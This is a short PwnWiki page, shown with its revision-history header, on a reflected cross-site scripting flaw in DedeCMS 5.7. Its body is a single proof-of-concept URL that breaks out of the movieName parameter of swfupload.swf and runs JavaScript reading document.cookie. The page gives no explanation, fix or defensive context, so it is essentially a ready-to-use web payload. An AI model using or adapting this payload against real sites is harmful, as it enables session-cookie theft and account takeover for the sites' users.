DedeCMS 5.7 swf文件反射型XSS漏洞

From PwnWiki
Revision as of 10:33, 10 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://127.0.0.1/images/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(document.cookie)}}// </pre>")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

http://127.0.0.1/images/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(document.cookie)}}//